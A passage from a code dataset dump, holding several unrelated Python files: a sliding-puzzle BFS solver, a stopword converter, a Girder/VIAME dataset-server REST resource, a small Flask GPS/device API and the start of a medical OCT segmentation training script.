% self.dimensions[1]):\n if tileRightX != None:\n gameChange[self.nullIndex] = self.gamestate[tileRightX]\n gameChange[tileRightX] = None\n newState = PuzzleState(self.dimensions, gameChange, self, 'Right')\n return newState\n \n raise BadMoveException('Left', 'Illegal Move Operation')\n\n def moveLeft(self):\n '''Returns a new instance of PuzzleState where the gap and the value\nto its right are flipped.'''\n gameChange = self.gamestate[:]\n tileLeftX = self.nullIndex - 1\n if (tileLeftX % self.dimensions[1]) < (self.nullIndex % self.dimensions[1]):\n if tileLeftX != None:\n gameChange[self.nullIndex] = self.gamestate[tileLeftX]\n gameChange[tileLeftX] = None\n newState = PuzzleState(self.dimensions, gameChange, self, 'Left')\n return newState\n\n raise BadMoveException('Right', 'Illegal Move Operation')\n\n def __str__(self):\n '''Returns a string giving a human-readable representation of the\npuzzle's state.'''\n string = ''\n count = 0\n for item in self.gamestate:\n if count == self.dimensions[0]:\n count = 0\n string = string + '\\n'\n if item != None:\n string = string + \" \" + str(item)\n else:\n string = string + \" N\"\n count += 1\n \n return string\n\n def __eq__(self, other):\n '''Tests whether two PuzzleState instances have the same gamestates.'''\n if self.gamestate == other.gamestate:\n return True\n else:\n return False\n\n\nclass PuzzleSolver (object):\n '''Takes two instances of PuzzleState, an initial and final state, and\ndetermines the solution and some statistics to the problem.\n\nFor details, see: https://github.com/rfdickerson/CS241/tree/master/A5'''\n\n def __init__(self, initial, goal):\n assert initial.dimensions == goal.dimensions, \"initial and goal dimensions must be the same\"\n self.initial = initial\n self.goal = goal\n\n def solve(self):\n '''Solves the puzzle and returns a list of the PuzzleStates used to get\nfrom the initial state to the goal state. The 0th element of the list\nshould be the initial state stored at self.initial, and the last\nelement of the list should be the goal state stored at self.goal.\nTips! (er, requirements...)\n- Use deque from the collections module to keep track of pending\nstates, that is, parents whose children need finding. Use append and\npopleft to push and pop items, respectively.\n- Keep track of states you've already found so you don't move back and\nforth between the same states forever. A Python list is fine here.\n- Keeping track of parents and moves in the constructor of the\nPuzzleState class means you don't need to do any weird additional\nlinking stuff to keep track of the solution. It's already done!'''\n solutionSet = []\n visitedStates = []\n pendingStates = deque()\n currentState = self.initial\n count = 0\n while currentState != self.goal:\n try:\n sUp = currentState.moveUp()\n if sUp not in visitedStates:\n pendingStates.append(sUp)\n except BadMoveException:\n pass\n \n try:\n sDown = currentState.moveDown()\n if sDown not in visitedStates:\n pendingStates.append(sDown)\n except BadMoveException:\n pass\n \n try:\n sLeft = currentState.moveLeft()\n if sLeft not in visitedStates:\n pendingStates.append(sLeft)\n except BadMoveException:\n pass\n \n try:\n sRight = currentState.moveRight()\n if sRight not in visitedStates:\n pendingStates.append(sRight)\n except BadMoveException:\n pass\n \n visitedStates.append(currentState)\n currentState = pendingStates.popleft()\n if self.goal in pendingStates:\n while currentState is not self.goal:\n if currentState == self.goal:\n break\n currentState = pendingStates.popleft()\n if currentState == self.goal:\n break\n \n runner = currentState\n \n while runner != self.initial:\n solutionSet.append(runner)\n runner = runner.parent\n if runner == self.initial:\n break\n \n solutionSet.append(runner)\n solutionSet = solutionSet[::-1]\n return solutionSet\n\n def movesToSolve(self):\n '''Returns a list of strings (in English) representing the directions\nto move the blank space in order to solve the puzzle. Depends on the\nsolve method, above.'''\n\n solution = self.solve()\n\n # [1:] slicing omits the lastMove of the initial state, which is None\n return [ state.lastMove for state in solution[1:] ]\n\n\nif __name__ == \"__main__\":\n dimensions = (3, 3)\n parent = lastMove = None\n initial = PuzzleState(dimensions, [2,8,3,1,6,4,7,None,5], parent, lastMove)\n goal = PuzzleState(dimensions, [None,2,3,1,8,6,7,5,4], parent, lastMove)\n\n solver = PuzzleSolver(initial, goal)\n soln = solver.solve()","sub_path":"A5/slidingpuzzle.py","file_name":"slidingpuzzle.py","file_ext":"py","file_size_in_byte":8558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"534169871","text":"\"\"\"\n实现将保存有中英文停用词的.txt文件保存成.csv文件\n\"\"\"\nimport codecs\nimport pandas as pd\n\n\nclass stopWords:\n def __init__(self, path, savePath):\n self.path = path\n self.savePath = savePath\n\n def dealFunc(self):\n data = codecs.open(self.path, 'r', encoding='utf-8')\n line = data.readline()\n result = list()\n while line:\n result.append(str(line.strip()))\n line = data.readline()\n\n result = pd.DataFrame({'stopWords': list(set(result))})\n result.fillna(\" \", inplace=True)\n result.to_csv(self.savePath, index=None)\n\n\nif __name__ == '__main__':\n path = './data/stopWord.txt'\n savePath = './data/stopWord.csv'\n stopWords(path, savePath).dealFunc()","sub_path":"stopWords.py","file_name":"stopWords.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"349125251","text":"from typing import List\n\nfrom girder.api import access\nfrom girder.api.describe import Description, autoDescribeRoute, describeRoute\nfrom girder.api.rest import Resource\nfrom girder.constants import AccessType\nfrom girder.exceptions import RestException\nfrom girder.models.folder import Folder\nfrom girder.models.item import Item\nfrom girder.models.setting import Setting\nfrom girder.models.token import Token\nfrom girder.models.user import User\nfrom girder_jobs.models.job import Job\n\nfrom dive_tasks.tasks import (\n UPGRADE_JOB_DEFAULT_URLS,\n convert_images,\n convert_video,\n train_pipeline,\n upgrade_pipelines,\n)\nfrom dive_utils import TRUTHY_META_VALUES, fromMeta, models\nfrom dive_utils.constants import (\n JOBCONST_PIPELINE_NAME,\n JOBCONST_PRIVATE_QUEUE,\n JOBCONST_RESULTS_FOLDER_ID,\n JOBCONST_TRAINING_CONFIG,\n JOBCONST_TRAINING_INPUT_IDS,\n SETTINGS_CONST_JOBS_CONFIGS,\n ConfidenceFiltersMarker,\n DatasetMarker,\n ForeignMediaIdMarker,\n PublishedMarker,\n UserPrivateQueueEnabledMarker,\n csvRegex,\n imageRegex,\n jsonRegex,\n safeImageRegex,\n videoRegex,\n ymlRegex,\n)\nfrom dive_utils.types import AvailableJobSchema, PipelineDescription\n\nfrom .pipelines import load_pipelines, run_pipeline\nfrom .serializers import meva as meva_serializer\nfrom .training import ensure_csv_detections_file, training_output_folder\nfrom .transforms import GetPathFromItemId\nfrom .utils import (\n createSoftClone,\n detections_file,\n detections_item,\n get_or_create_auxiliary_folder,\n getCloneRoot,\n process_csv,\n process_json,\n saveTracks,\n valid_images,\n verify_dataset,\n)\n\n\nclass Viame(Resource):\n def __init__(self):\n super(Viame, self).__init__()\n self.resourceName = \"viame\"\n\n self.route(\"GET\", (\"datasets\",), self.list_datasets)\n self.route(\"POST\", (\"dataset\", \":id\", \"clone\"), self.clone_dataset)\n self.route(\"GET\", (\"brand_data\",), self.get_brand_data)\n self.route(\"GET\", (\"pipelines\",), self.get_pipelines)\n self.route(\"GET\", (\"training_configs\",), self.get_training_configs)\n self.route(\"POST\", (\"pipeline\",), self.run_pipeline_task)\n self.route(\"POST\", (\"train\",), self.run_training)\n self.route(\"POST\", (\"upgrade_pipelines\",), self.upgrade_pipelines)\n self.route(\"POST\", (\"update_job_configs\",), self.update_job_configs)\n self.route(\"POST\", (\"postprocess\", \":id\"), self.postprocess)\n self.route(\"PUT\", (\"metadata\", \":id\"), self.update_metadata)\n self.route(\"PUT\", (\"attributes\",), self.save_attributes)\n self.route(\"POST\", (\"validate_files\",), self.validate_files)\n self.route(\"GET\", (\"valid_images\",), self.get_valid_images)\n self.route(\"PUT\", (\"user\", \":id\", \"use_private_queue\"), self.use_private_queue)\n\n def _get_queue_name(self, default=\"celery\"):\n user = self.getCurrentUser()\n if user.get(UserPrivateQueueEnabledMarker, False):\n return f'{user[\"login\"]}@private'\n return default\n\n @access.admin\n @autoDescribeRoute(\n Description(\"Upgrade addon pipelines\")\n .param(\n \"force\",\n \"Force re-download of all addons.\",\n paramType=\"query\",\n dataType=\"boolean\",\n default=False,\n required=False,\n )\n .jsonParam(\n \"urls\",\n \"List of public URLs for addon zipfiles\",\n paramType='body',\n requireArray=True,\n required=False,\n default=UPGRADE_JOB_DEFAULT_URLS,\n )\n )\n def upgrade_pipelines(self, force: bool, urls: List[str]):\n token = Token().createToken(user=self.getCurrentUser(), days=1)\n Setting().set(SETTINGS_CONST_JOBS_CONFIGS, None)\n upgrade_pipelines.delay(\n urls=urls,\n force=force,\n girder_job_title=\"Upgrade Pipelines\",\n girder_client_token=str(token[\"_id\"]),\n )\n\n @access.admin\n @autoDescribeRoute(\n Description(\"Persist discovered job configurations\").jsonParam(\n \"configs\",\n \"Replace static job configurations\",\n required=True,\n requireObject=True,\n paramType='body',\n )\n )\n def update_job_configs(self, configs: AvailableJobSchema):\n Setting().set(SETTINGS_CONST_JOBS_CONFIGS, configs)\n\n @access.public\n @autoDescribeRoute(Description(\"Get custom brand data\"))\n def get_brand_data(self):\n adminUserIds = [user['_id'] for user in User().getAdmins()]\n # Find an item owned by an admin with meta.brand=True\n data = Item().findOne(\n {\n 'meta.brand': {'$in': TRUTHY_META_VALUES},\n 'creatorId': {'$in': adminUserIds},\n }\n )\n if data is not None:\n return data['meta']\n return {}\n\n @access.user\n @describeRoute(\n Description(\"List datasets in the system\")\n .pagingParams(\"created\")\n .param(\n PublishedMarker,\n 'Return only published datasets',\n required=False,\n default=False,\n dataType='boolean',\n )\n )\n def list_datasets(self, params):\n limit, offset, sort = self.getPagingParameters(params)\n query = {\n f'meta.{DatasetMarker}': {'$in': TRUTHY_META_VALUES},\n }\n if self.boolParam(PublishedMarker, params):\n query = {\n '$and': [\n query,\n {f'meta.{PublishedMarker}': {'$in': TRUTHY_META_VALUES}},\n ]\n }\n return Folder().findWithPermissions(\n query, offset=offset, limit=limit, sort=sort, user=self.getCurrentUser()\n )\n\n @access.user\n @autoDescribeRoute(\n Description(\"Clone a dataset\")\n .modelParam(\n \"id\",\n description=\"Dataset clone source\",\n model=Folder,\n level=AccessType.READ,\n )\n .modelParam(\n \"parentFolderId\",\n description=\"Parent folder of the clone\",\n paramType=\"formData\",\n destName=\"parentFolder\",\n model=Folder,\n level=AccessType.WRITE,\n )\n .param(\n \"name\",\n \"Name for new dataset\",\n paramType=\"formData\",\n dataType=\"string\",\n default=None,\n required=False,\n )\n )\n def clone_dataset(self, folder, parentFolder, name):\n verify_dataset(folder)\n owner = self.getCurrentUser()\n return createSoftClone(owner, folder, parentFolder, name)\n\n @access.user\n @describeRoute(Description(\"Get available pipeline configurations\"))\n def get_pipelines(self, params):\n return load_pipelines(self.getCurrentUser())\n\n @access.user\n @autoDescribeRoute(Description(\"Get available training configs\"))\n def get_training_configs(self, params):\n static_job_configs: AvailableJobSchema = (\n Setting().get(SETTINGS_CONST_JOBS_CONFIGS) or {}\n )\n return static_job_configs.get('training', {})\n\n @access.user\n @autoDescribeRoute(\n Description(\"Run viame pipeline\")\n .modelParam(\n \"folderId\",\n description=\"Folder id of a video clip\",\n model=Folder,\n paramType=\"query\",\n required=True,\n level=AccessType.WRITE,\n )\n .jsonParam(\"pipeline\", \"The pipeline to run on the dataset\", required=True)\n )\n def run_pipeline_task(self, folder, pipeline: PipelineDescription):\n user = self.getCurrentUser()\n return run_pipeline(user, folder, pipeline, self._get_queue_name(\"pipelines\"))\n\n @access.user\n @autoDescribeRoute(\n Description(\"Run training on a folder\")\n .jsonParam(\n \"folderIds\",\n description=\"Array of folderIds to run training on\",\n paramType=\"body\",\n )\n .param(\n \"pipelineName\",\n description=\"The name of the resulting pipeline\",\n paramType=\"query\",\n required=True,\n )\n .param(\n \"config\",\n description=\"The configuration to use for training\",\n paramType=\"query\",\n required=True,\n )\n )\n def run_training(self, folderIds, pipelineName, config):\n user = self.getCurrentUser()\n token = Token().createToken(user=user, days=14)\n\n detection_list = []\n folder_list = []\n folder_names = []\n if folderIds is None or len(folderIds) == 0:\n raise RestException(\"No folderIds in param\")\n\n for folderId in folderIds:\n folder = Folder().load(folderId, level=AccessType.READ, user=user)\n if folder is None:\n raise RestException(f\"Cannot access folder {folderId}\")\n getCloneRoot(user, folder)\n folder_names.append(folder['name'])\n # Ensure detection has a csv format\n # TODO: Move this into worker job\n train_on_detections_item = detections_item(folder, strict=True)\n ensure_csv_detections_file(folder, train_on_detections_item, user)\n detection_list.append(train_on_detections_item)\n folder_list.append(folder)\n\n # Ensure the folder to upload results to exists\n results_folder = training_output_folder(user)\n job_is_private = user.get(UserPrivateQueueEnabledMarker, False)\n newjob = train_pipeline.apply_async(\n queue=self._get_queue_name(\"training\"),\n kwargs=dict(\n results_folder=results_folder,\n source_folder_list=folder_list,\n groundtruth_list=detection_list,\n pipeline_name=pipelineName,\n config=config,\n girder_client_token=str(token[\"_id\"]),\n girder_job_title=(f\"Running training on {len(folder_list)} datasets\"),\n girder_job_type=\"private\" if job_is_private else \"training\",\n ),\n )\n newjob.job[JOBCONST_PRIVATE_QUEUE] = job_is_private\n newjob.job[JOBCONST_TRAINING_INPUT_IDS] = folderIds\n newjob.job[JOBCONST_RESULTS_FOLDER_ID] = str(results_folder['_id'])\n newjob.job[JOBCONST_TRAINING_CONFIG] = config\n newjob.job[JOBCONST_PIPELINE_NAME] = pipelineName\n Job().save(newjob.job)\n return newjob.job\n\n @access.user\n @autoDescribeRoute(\n Description(\"Test whether or not a set of files are safe to upload\").jsonParam(\n \"files\", \"\", paramType=\"body\"\n )\n )\n def validate_files(self, files):\n ok = True\n message = \"\"\n mediatype = \"\"\n videos = [f for f in files if videoRegex.search(f)]\n csvs = [f for f in files if csvRegex.search(f)]\n images = [f for f in files if imageRegex.search(f)]\n ymls = [f for f in files if ymlRegex.search(f)]\n jsons = [f for f in files if jsonRegex.search(f)]\n if len(videos) and len(images):\n ok = False\n message = \"Do not upload images and videos in the same batch.\"\n elif len(csvs) > 1:\n ok = False\n message = \"Can only upload a single CSV Annotation per import\"\n elif len(jsons) > 1:\n ok = False\n message = \"Can only upload a single JSON Annotation per import\"\n elif len(csvs) == 1 and len(ymls):\n ok = False\n message = \"Cannot mix annotation import types\"\n elif len(videos) > 1 and (len(csvs) or len(ymls) or len(jsons)):\n ok = False\n message = (\n \"Annotation upload is not supported when multiple videos are uploaded\"\n )\n elif (not len(videos)) and (not len(images)):\n ok = False\n message = \"No supported media-type files found\"\n elif len(videos):\n mediatype = 'video'\n elif len(images):\n mediatype = 'image-sequence'\n\n return {\n \"ok\": ok,\n \"message\": message,\n \"type\": mediatype,\n \"media\": images + videos,\n \"annotations\": csvs + ymls + jsons,\n }\n\n @access.user\n @autoDescribeRoute(\n Description(\"Post-processing to be run after media/annotation import\")\n .modelParam(\n \"id\",\n description=\"Folder containing the items to process\",\n model=Folder,\n level=AccessType.WRITE,\n )\n .param(\n \"skipJobs\",\n \"Whether to skip processing that might dispatch worker jobs\",\n paramType=\"formData\",\n dataType=\"boolean\",\n default=False,\n required=False,\n )\n )\n def postprocess(self, folder, skipJobs):\n \"\"\"\n Post-processing to be run after media/annotation import\n\n\n When skipJobs=False, the following may run as jobs:\n Transcoding of Video\n Transcoding of Images\n Conversion of KPF annotations into track JSON\n\n In either case, the following may run synchronously:\n Conversion of CSV annotations into track JSON\n \"\"\"\n user = self.getCurrentUser()\n job_is_private = user.get(UserPrivateQueueEnabledMarker, False)\n auxiliary = get_or_create_auxiliary_folder(folder, user)\n isClone = fromMeta(folder, ForeignMediaIdMarker, None) is not None\n # add default confidence filter threshold to folder metadata\n folder['meta'][ConfidenceFiltersMarker] = {'default': 0.1}\n\n if not skipJobs and not isClone:\n token = Token().createToken(user=user, days=2)\n # transcode VIDEO if necessary\n videoItems = Folder().childItems(\n folder, filters={\"lowerName\": {\"$regex\": videoRegex}}\n )\n\n for item in videoItems:\n newjob = convert_video.apply_async(\n queue=self._get_queue_name(),\n kwargs=dict(\n path=GetPathFromItemId(str(item[\"_id\"])),\n folderId=str(item[\"folderId\"]),\n auxiliaryFolderId=auxiliary[\"_id\"],\n itemId=str(item[\"_id\"]),\n girder_job_title=f\"Converting {item['_id']} to a web friendly format\",\n girder_client_token=str(token[\"_id\"]),\n girder_job_type=\"private\" if job_is_private else \"convert\",\n ),\n )\n newjob.job[JOBCONST_PRIVATE_QUEUE] = job_is_private\n Job().save(newjob.job)\n\n # transcode IMAGERY if necessary\n imageItems = Folder().childItems(\n folder, filters={\"lowerName\": {\"$regex\": imageRegex}}\n )\n safeImageItems = Folder().childItems(\n folder, filters={\"lowerName\": {\"$regex\": safeImageRegex}}\n )\n\n if imageItems.count() > safeImageItems.count():\n newjob = convert_images.apply_async(\n queue=self._get_queue_name(),\n kwargs=dict(\n folderId=folder[\"_id\"],\n girder_client_token=str(token[\"_id\"]),\n girder_job_title=f\"Converting {folder['_id']} to a web friendly format\",\n girder_job_type=\"private\" if job_is_private else \"convert\",\n ),\n )\n newjob.job[JOBCONST_PRIVATE_QUEUE] = job_is_private\n Job().save(newjob.job)\n\n elif imageItems.count() > 0:\n folder[\"meta\"][DatasetMarker] = True\n\n # transform KPF if necessary\n ymlItems = Folder().childItems(\n folder, filters={\"lowerName\": {\"$regex\": ymlRegex}}\n )\n if ymlItems.count() > 0:\n # There might be up to 3 yamls\n allFiles = [Item().childFiles(item)[0] for item in ymlItems]\n saveTracks(folder, meva_serializer.load_kpf_as_tracks(allFiles), user)\n ymlItems.rewind()\n for item in ymlItems:\n Item().move(item, auxiliary)\n\n Folder().save(folder)\n\n process_csv(folder, user)\n process_json(folder, user)\n\n # If no detections file exists create one\n if detections_file(folder) is None:\n saveTracks(folder, {}, user)\n\n return folder\n\n @access.user\n @autoDescribeRoute(\n Description(\"Save mutable metadata for a dataset\")\n .modelParam(\n \"id\",\n description=\"datasetId or folder for the metadata\",\n model=Folder,\n level=AccessType.WRITE,\n )\n .jsonParam(\n \"data\",\n \"JSON with the metadata to set\",\n requireObject=True,\n paramType=\"body\",\n )\n .errorResponse('Using a reserved metadata key', 400)\n )\n def update_metadata(self, folder, data):\n verify_dataset(folder)\n validated = models.MetadataMutableUpdate(**data)\n for name, value in validated.dict(exclude_none=True).items():\n folder['meta'][name] = value\n Folder().save(folder)\n return folder['meta']\n\n @access.user\n @autoDescribeRoute(\n Description(\"\")\n .modelParam(\n \"folderId\",\n description=\"folder id of a clip\",\n model=Folder,\n paramType=\"query\",\n required=True,\n level=AccessType.WRITE,\n )\n .jsonParam(\n \"attributes\",\n \"upsert and delete attributes\",\n paramType=\"body\",\n requireObject=True,\n )\n )\n def save_attributes(self, folder, attributes):\n verify_dataset(folder)\n upsert = attributes.get('upsert', [])\n delete = attributes.get('delete', [])\n attributes_dict = fromMeta(folder, 'attributes', {})\n for attribute_id in delete:\n attributes_dict.pop(str(attribute_id), None)\n for attribute in upsert:\n validated: models.Attribute = models.Attribute(**attribute)\n attributes_dict[str(validated.key)] = validated.dict(exclude_none=True)\n\n upserted_len = len(upsert)\n deleted_len = len(delete)\n\n if upserted_len or deleted_len:\n folder['meta']['attributes'] = attributes_dict\n Folder().save(folder)\n\n return {\n \"updated\": upserted_len,\n \"deleted\": deleted_len,\n }\n\n @access.user\n @autoDescribeRoute(\n Description(\"\").modelParam(\n \"folderId\",\n description=\"folder id of a clip\",\n model=Folder,\n paramType=\"query\",\n required=True,\n level=AccessType.READ,\n )\n )\n def get_valid_images(self, folder):\n return valid_images(folder, self.getCurrentUser())\n\n @access.user\n @autoDescribeRoute(\n Description('Set user use private queue')\n .modelParam(\"id\", description='user id', model=User, level=AccessType.ADMIN)\n .param(\n \"privateQueueEnabled\",\n description=\"Set private queue enabled\",\n paramType='query',\n dataType='boolean',\n default=None,\n )\n )\n def use_private_queue(self, user: dict, privateQueueEnabled: bool):\n if privateQueueEnabled is not None:\n user[UserPrivateQueueEnabledMarker] = privateQueueEnabled\n User().save(user)\n return {\n UserPrivateQueueEnabledMarker: user.get(\n UserPrivateQueueEnabledMarker, False\n ),\n }\n","sub_path":"server/dive_server/viame.py","file_name":"viame.py","file_ext":"py","file_size_in_byte":19741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"422792443","text":"#!flask/bin/python\nimport six\nfrom flask import Flask, jsonify, abort, request, make_response, url_for\nfrom app.models import Device, GPS, DeviceSchema, GPSSchema\nimport os\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_marshmallow import Marshmallow\nimport datetime\n\napp = Flask(__name__)\nbasedir = os.path.abspath(os.path.dirname(__file__))\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(basedir, 'crus.sqlite')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\nma = Marshmallow(app)\n\ngps_schema = GPSSchema()\ngpss_schema = GPSSchema(many=True)\ndevice_schema = DeviceSchema()\ndevices_schema = DeviceSchema(many=True)\n\n@app.shell_context_processor\ndef make_shell_context():\n return {'db': db, 'Device': Device, 'GPS': GPS}\n\n@app.errorhandler(400)\ndef bad_request(error):\n\treturn make_response(jsonify({'error': 'Bad request'}), 400)\n\t\n@app.errorhandler(404)\ndef not_found(error):\n\treturn make_response(jsonify({'error': 'Not found'}), 404)\n\t\t\n@app.route('/p1/device', methods=['GET'])\ndef get_devices():\n\tall_devices = Device.query.all()\n\tresult = devices_schema.dump(all_devices)\n\treturn jsonify(result.data)\n\t\n@app.route('/p1/device/', methods=['GET'])\ndef get_device(device_id):\n\tif device_id == 0:\n\t\tabort(404)\n\tdevice = Device.query.get(device_id)\n\treturn device_schema.jsonify(device)\n\t\n@app.route('/p1/device', methods=['POST'])\ndef add_device():\n\tif not request.json or 'name' not in request.json:\n\t\tabort(400)\n\t\t\n\tname = request.json['name']\n\tsimid = request.json['simid']\n\tregisterutc = register.json['registerutc']\n\t\n\tnew_device = Device(name, simid, registerutc)\n\t\n\tdb.session.add(new_device)\n\tdb.session.commit()\n\t\n\treturn jsonify(new_device)\n\n@app.route('/p1/device/', methods=['PUT'])\ndef update_device(device_id):\n\tif device == 0:\n\t\tabort(404)\n\tif not request.json:\n\t\tabort(400)\n\tif 'name' in request.json and not isinstance(request.json['name'], six.string_types):\n\t\tabort(400)\n\tif 'simid' in request.json and not isinstance(request.json['simid'], six.string_types):\n\t\tabort(400)\n\tif 'registerutc' in reuqest.json and not isinstance(request.json['registerutc'], DateTime):\n\t\tabort(400)\n\tdevice = Device.query.get(device_id)\n\tname = request.json['name']\n\tsimid = request.json['simid']\n\tregisterutc = request.json['registerutc']\n\t\n\tdevice.name = name\n\tdevice.simid = simid\n\tdevice.registerutc = registerutc\n\t\n\tdb.session.commit()\n\treturn device_schema.jsonify(user)\n\t\n@app.route('/p1/device/gps', methods=['GET'])\ndef get_gps_device():\n\tall_gps = GPS.query.all()\n\tresult = gps_schema.dump(all_gps)\n\treturn jsonify(result.data)\n\t\n@app.route('/p1/gps/', methods=['GET'])\ndef get_gps(gps_id):\n\tif gps_id == 0:\n\t\tabort(404)\n\tgps = GPS.query.get(gps_id)\n\treturn gps_schema.jsonify(gps)\n\t\n@app.route('/p1/gps', methods=['POST'])\ndef add_gps():\n\tif not request.json or 'name' not in request.json:\n\t\tabort(400)\n\t\n\tdevice_id = request.json['device_id']\n\tutc = request.json['utc']\n\tlatitude = request.json['latitude']\n\tlatDir = request.json['latDir']\n\tlongitude = request.json['longitude']\n\tlongDir = request.json['longDir']\n\thdop = request.json['hdop']\n\taltitude = request.json['altitude']\n\tfix = request.json['fix']\n\tcog = request.json['cog']\n\tspkm = request.json['spkm']\n\tspkn = request.json['spkn']\n\tdate = request.json['date']\n\tnsat = request.json['nsat']\n\t\n\tnew_gps = GPS(device_id, utc, latitude, latDir, \\\n\t\tlongitude, longDir, hdop, altitude, fix, cog, \\\n\t\tspkm, spkn, date, nsat)\n\t\n\tdb.session.add(new_device)\n\tdb.session.commit()\n\t\n\treturn jsonify(new_device)\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"429667648","text":"import os\nimport errno\nimport torch\nimport torch.nn as nn\nimport numpy as np\nimport time\nimport timeit\nfrom torch.utils import data\nimport torch.nn.functional as F\n\nfrom torch.optim import lr_scheduler\nfrom NNLoss import dice_loss\nfrom NNMetrics import segmentation_scores, f1_score\nfrom NNMetrics import intersectionAndUnion\nfrom NNUtils import evaluate, test\nfrom tensorboardX import SummaryWriter\nfrom torch.autograd import grad\n# ================================================\nfrom NNBaselines import SegNet, AttentionUNet\n\nfrom Unet import UNet\n\nfrom SOASNet_basic import SOASNet\nfrom SOASNet_large_scale import SOASNet_ls\nfrom SOASNet_multi_attention import SOASNet_ma\nfrom SOASNet_very_large_scale import SOASNet_vls\nfrom SOASNet_segnet_back import SOASNet_segnet\nfrom SOASNet_segnet_relay_net import SOASNet_segnet_skip\nfrom SOASNet_single_scale import SOASNet_ss\n\nfrom adamW import AdamW\n# =============================\nfrom NNUtils import getData_OCT\n# =============================\n\n\ndef trainModels(repeat,\n data_set,\n input_dim,\n train_batch,\n model,\n epochs,\n width,\n l_r,\n l_r_s,\n shuffle,\n loss,\n norm,\n log,\n class_no,\n depth,\n depth_limit,\n data_augmentation_train,\n data_augmentation_test,\n cluster=False):\n\n if cluster is False:\n\n if data_set == 'duke':\n\n data_directory = '/home/moucheng/projects_data/OCT/duke_dataset/'\n\n else:\n\n data_directory = '/home/moucheng/projects_data/OCT/our_data/'\n\n else:\n\n if data_set == 'duke':\n\n data_directory = '/cluster/project0/CityScapes/projects_data/OCT/duke/'\n\n else:\n\n data_directory = '/cluster/project0/CityScapes/projects_data/OCT/'\n\n # trainloader, train_dataset, validate_dataset, test_dataset_1, test_dataset_2 = getData_OCT(data_directory, train_batch, shuffle_mode=shuffle, augmentation=data_augmentation)\n #\n if cluster is False and data_set == 'duke':\n #\n for j in range(1, 6, 1):\n #\n data_directory = '/home/moucheng/projects_data/OCT/duke_dataset/' + str(j) + '/'\n #\n trainloader, train_dataset, validate_dataset, test_dataset_1, test_dataset_2 = getData_OCT(data_directory, train_batch, shuffle_mode=shuffle, augmentation_train=data_augmentation_train, augmentation_test=data_augmentation_test)\n #\n trained_model = trainSingleModel(model_name=model,\n epochs=epochs,\n width=width,\n lr=l_r,\n repeat=str(j),\n lr_scedule=l_r_s,\n train_dataset=train_dataset,\n train_batch=train_batch,\n train_loader=trainloader,\n data_name=data_set,\n validate_data=validate_dataset,\n test_data_1=test_dataset_1,\n test_data_2=test_dataset_2,\n data_augmentation_train=data_augmentation_train,\n data_augmentation_test=data_augmentation_test,\n shuffle=shuffle,\n loss=loss,\n norm=norm,\n log=log,\n no_class=class_no,\n input_channel=input_dim,\n depth=depth,\n depth_limit=depth_limit)\n\n elif cluster is True and data_set == 'duke':\n #\n for j in range(1, 6, 1):\n #\n data_directory = '/cluster/project0/CityScapes/projects_data/OCT/duke/' + str(j) + '/'\n #\n trainloader, train_dataset, validate_dataset, test_dataset_1, test_dataset_2 = getData_OCT(data_directory, train_batch, shuffle_mode=shuffle, augmentation_train=data_augmentation_train, augmentation_test=data_augmentation_test)\n #\n trained_model = trainSingleModel(model_name=model,\n epochs=epochs,\n width=width,\n lr=l_r,\n repeat=str(j),\n lr_scedule=l_r_s,\n train_dataset=train_dataset,\n train_batch=train_batch,\n train_loader=trainloader,\n data_name=data_set,\n validate_data=validate_dataset,\n test_data_1=test_dataset_1,\n test_data_2=test_dataset_2,\n data_augmentation_train=data_augmentation_train,\n data_augmentation_test=data_augmentation_test,\n shuffle=shuffle,\n loss=loss,\n norm=norm,\n log=log,\n no_class=class_no,\n input_channel=input_dim,\n depth=depth,\n depth_limit=depth_limit)\n\n else:\n #\n trainloader, train_dataset, validate_dataset, test_dataset_1, test_dataset_2 = getData_OCT(data_directory, train_batch, shuffle_mode=shuffle, augmentation_train=data_augmentation_train, augmentation_test=data_augmentation_test)\n #\n for j in range(1, repeat+1, 1):\n #\n trained_model = trainSingleModel(model_name=model,\n epochs=epochs,\n width=width,\n lr=l_r,\n repeat=str(j),\n lr_scedule=l_r_s,\n train_dataset=train_dataset,\n train_batch=train_batch,\n train_loader=trainloader,\n data_name=data_set,\n validate_data=validate_dataset,\n test_data_1=test_dataset_1,\n test_data_2=test_dataset_2,\n data_augmentation_train=data_augmentation_train,\n data_augmentation_test=data_augmentation_test,\n shuffle=shuffle,\n loss=loss,\n norm=norm,\n log=log,\n no_class=class_no,\n input_channel=input_dim,\n depth=depth,\n depth_limit=depth_limit)\n\n\ndef trainSingleModel(model_name,\n depth_limit,\n epochs,\n width,\n depth,\n repeat,\n lr,\n lr_scedule,\n train_dataset,\n train_batch,\n data_name,\n data_augmentation_train,\n data_augmentation_test,\n train_loader,\n validate_data,\n test_data_1,\n test_data_2,\n shuffle,\n loss,\n norm,\n log,\n no_class,\n input_channel):\n # :param model: network module\n # :param epochs: training total epochs\n # :param width: first encoder channel number\n # :param lr: learning rate\n # :param lr_scedule: true or false for learning rate schedule\n # :param repeat: repeat same experiments\n # :param train_dataset: training data set\n # :param train_batch: batch size\n # :param train_loader: training loader\n # :param validate_loader: validation loader\n # :param shuffle: shuffle training data or not\n # :param loss: loss function tag, use 'ce' for cross-entropy\n # :param weights_transfer: 'dynamic', 'static' or 'average'\n # :param alpha: weight for knowledge distillation loss\n # :param norm_1: normalisation for model 1\n # :param norm_2: normalisation for model 2\n # :param log: log tag for recording experiments\n # :param no_class: 2 or multi-class\n # :param input_channel: 4 for BRATS, 3 for CityScapes\n # :param dataset_name: name of the dataset\n # :param temperature_start: 2 or 4\n # :param temperature_end: 4 or 2\n # :return:\n device = torch.device('cuda:0')\n\n # side_output_use = False\n\n if model_name == 'unet':\n\n model = UNet(n_channels=input_channel, n_classes=no_class, bilinear=True).to(device=device)\n\n # model = UNet2(in_channels=1, n_classes=1, depth=4, wf=32, 